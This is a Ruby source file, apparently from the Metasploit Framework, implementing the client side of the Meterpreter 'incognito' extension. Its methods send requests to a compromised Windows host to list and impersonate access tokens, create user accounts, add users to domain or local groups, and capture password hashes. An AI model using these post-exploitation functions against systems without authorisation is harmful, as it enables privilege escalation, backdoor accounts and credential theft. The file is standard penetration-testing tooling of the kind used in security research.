
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/incognito/tlv'
require 'rex/post/meterpreter/extensions/incognito/command_ids'
module Rex
module Post
module Meterpreter
module Extensions
module Incognito
###
#
# This meterpreter extension provides a privilege escalation interface that is capable
# of doing things like dumping password hashes and performing local
# exploitation.
#
###
class Incognito < Extension

  # @return the extension identifier constant for incognito
  def self.extension_id
    EXTENSION_ID_INCOGNITO
  end

  # Initializes the extension under the name 'incognito' and registers an
  # alias of the same name on the client that points back at this instance.
  #
  # @param client the client object this extension is attached to
  def initialize(client)
    super(client, 'incognito')

    alias_entry = {
      'name' => 'incognito',
      'ext' => self
    }
    client.register_extension_aliases([alias_entry])
  end

  # Sends a list-tokens request and collects the two token listings from the
  # response.
  #
  # @param token_order value placed in the TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER
  #   TLV; the accepted values are defined by the remote side, not in this file
  # @return [Hash] 'delegation' and 'impersonation' keys holding the matching
  #   response TLV values
  def incognito_list_tokens(token_order)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS).tap do |req|
      req.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
    end
    reply = client.send_request(packet)

    delegation = reply.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)
    impersonation = reply.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
    { 'delegation' => delegation, 'impersonation' => impersonation }
  end

  # Sends an impersonate-token request naming the given user.
  #
  # @param username value placed in the TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN TLV
  # @return the value of the generic response TLV
  def incognito_impersonate_token(username)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN).tap do |req|
      req.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
    end

    client.send_request(packet).get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
  end

  # Sends an add-user request carrying a user name, password and server name.
  #
  # NOTE(review): the password is placed in the request TLV exactly as given;
  # how the transport protects it is not visible from this file.
  #
  # @param host value placed in the TLV_TYPE_INCOGNITO_SERVERNAME TLV
  # @param username value placed in the TLV_TYPE_INCOGNITO_USERNAME TLV
  # @param password value placed in the TLV_TYPE_INCOGNITO_PASSWORD TLV
  # @return the value of the generic response TLV
  def incognito_add_user(host, username, password)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER).tap do |req|
      # TLVs are added in the same order as before: user, password, server.
      req.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
      req.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
      req.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
    end

    client.send_request(packet).get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
  end

  # Sends an add-group-user request carrying a user name, group name and
  # server name.
  #
  # @param host value placed in the TLV_TYPE_INCOGNITO_SERVERNAME TLV
  # @param groupname value placed in the TLV_TYPE_INCOGNITO_GROUPNAME TLV
  # @param username value placed in the TLV_TYPE_INCOGNITO_USERNAME TLV
  # @return the value of the generic response TLV
  def incognito_add_group_user(host, groupname, username)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER).tap do |req|
      req.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
      req.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
      req.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
    end

    client.send_request(packet).get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
  end

  # Sends an add-localgroup-user request; the TLVs are the same three as in
  # incognito_add_group_user, only the command id differs.
  #
  # @param host value placed in the TLV_TYPE_INCOGNITO_SERVERNAME TLV
  # @param groupname value placed in the TLV_TYPE_INCOGNITO_GROUPNAME TLV
  # @param username value placed in the TLV_TYPE_INCOGNITO_USERNAME TLV
  # @return the value of the generic response TLV
  def incognito_add_localgroup_user(host, groupname, username)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER).tap do |req|
      req.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
      req.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
      req.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
    end

    client.send_request(packet).get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
  end

  # Sends a snarf-hashes request naming the given server.
  #
  # The reply to the request is not inspected here, so the return value says
  # only that the request was sent without raising, not that the remote side
  # succeeded.
  #
  # @param host value placed in the TLV_TYPE_INCOGNITO_SERVERNAME TLV
  # @return [true] always
  def incognito_snarf_hashes(host)
    packet = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES)
    packet.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)

    client.send_request(packet)
    true
  end

end
end; end; end; end; end